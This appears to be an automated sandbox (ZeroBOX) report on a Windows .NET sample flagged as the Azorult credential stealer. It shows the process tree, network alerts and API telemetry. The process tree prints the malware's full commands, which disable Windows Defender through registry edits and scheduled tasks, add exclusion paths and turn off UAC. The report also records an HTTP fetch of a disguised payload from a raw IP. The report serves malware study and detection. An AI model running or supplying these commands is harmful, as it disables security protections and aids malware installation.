Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 6, 2023, 5:01 p.m.	July 6, 2023, 5:04 p.m.

Size	1.1MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`45dce82d48aaae2c56cf79f3cc4be96d`
SHA256	`4c6754f751e8c8d4b2d6ecb99c2052361dd7b0f7bc11a9c22d1f355f41cafa80`
CRC32	`8703BD48`
ssdeep	`12288:ismzHxmnz/NpzHb9UJ/pqVwHoIXQrn31scWXgFmTApopXdxxL:is4U7jHRVwHo8cWhQFmTjpNxV`
Yara	UPX_Zero - UPX packed file Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature IsPE32 - (no description)

Wllcsochcbi.exe "C:\Users\test22\AppData\Local\Temp\Wllcsochcbi.exe"
2548
- cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
  2740
  - powershell.exe powershell set-mppreference -exclusionpath C:\
    2808
- AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  2876
  - cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FFCC.tmp\FFDD.tmp\FFDE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    2976
    - reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      3068
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2076
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      2112
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      192
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2200
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2228
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2444
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2516
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2664
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      2720
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2780
    - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      2892
    - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      2940
    - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      2656
    - schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      3008
    - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      2056
    - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      2100
    - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      2208
    - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      2952
    - reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      2788
    - reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      2484
    - reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      2584
    - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      2760
    - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      2868
    - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      2624
    - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      2708
    - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      1404
    - powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      284
    - powershell.exe powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
      204
    - powershell.exe powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      2268
    - powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable"
      1892
    - powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
      2392

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
23.137.249.127	Active	Moloch
77.88.21.158	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 23.137.249.127:80 -> 192.168.56.101:49161	2017962	ET MALWARE PE EXE or DLL Windows file download disguised as ASCII	A Network Trojan was detected
TCP 23.137.249.127:80 -> 192.168.56.101:49161	2022640	ET MALWARE PE EXE or DLL Windows file download Text M2	A Network Trojan was detected
TCP 23.137.249.127:80 -> 192.168.56.101:49161	2035769	ET HUNTING [TW] Likely Hex Executable String	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (39 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 6, 2023, 5:03 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 6, 2023, 5:01 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:01 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:01 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:01 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:01 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:02 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:02 p.m.			0	0
IsDebuggerPresent July 6, 2023, 5:03 p.m.			0	0

Command line console output was observed (48 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The term 'set-mppreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: + set-mppreference <<<< -exclusionpath C:\ console_handle: 0x00000053	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: + CategoryInfo : ObjectNotFound: (set-mppreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: The specified task name "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: The specified task name "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: The specified task name "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: The specified task name "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: The specified task name "Microsoft\Windows\Windows Defender\Windows Defender Verification" does not exist in the system. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x000000000000000b	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:01 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\ console_handle: 0x000000000000001f	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: Microsoft\Windows\CurrentVersion\policies\system console_handle: 0x0000000000000023	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\ console_handle: 0x0000000000000027	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: Microsoft\Windows\CurrentVersion\policies console_handle: 0x000000000000002b	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: PSChildName : system console_handle: 0x000000000000002f	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: PSDrive : HKLM console_handle: 0x0000000000000033	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: PSProvider : Microsoft.PowerShell.Core\Registry console_handle: 0x0000000000000037	1	1
WriteConsoleW July 6, 2023, 5:02 p.m.	buffer: EnableLUA : 0 console_handle: 0x000000000000003b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 255 events)

Time & API	Arguments	Status	Return
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0044b3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0044b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0044b6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0044b630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300a28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003004e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003004e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003004e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300da8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300ea8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00300628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 6, 2023, 5:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003012a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 6, 2023, 5:01 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://23.137.249.127/efsdff3/frgsrgd/panel/uploads/Iprkfcbtfyj.wav

Performs some HTTP requests (1 event)

request

GET http://23.137.249.127/efsdff3/frgsrgd/panel/uploads/Iprkfcbtfyj.wav

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1073 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00592000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 6, 2023, 5:01 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
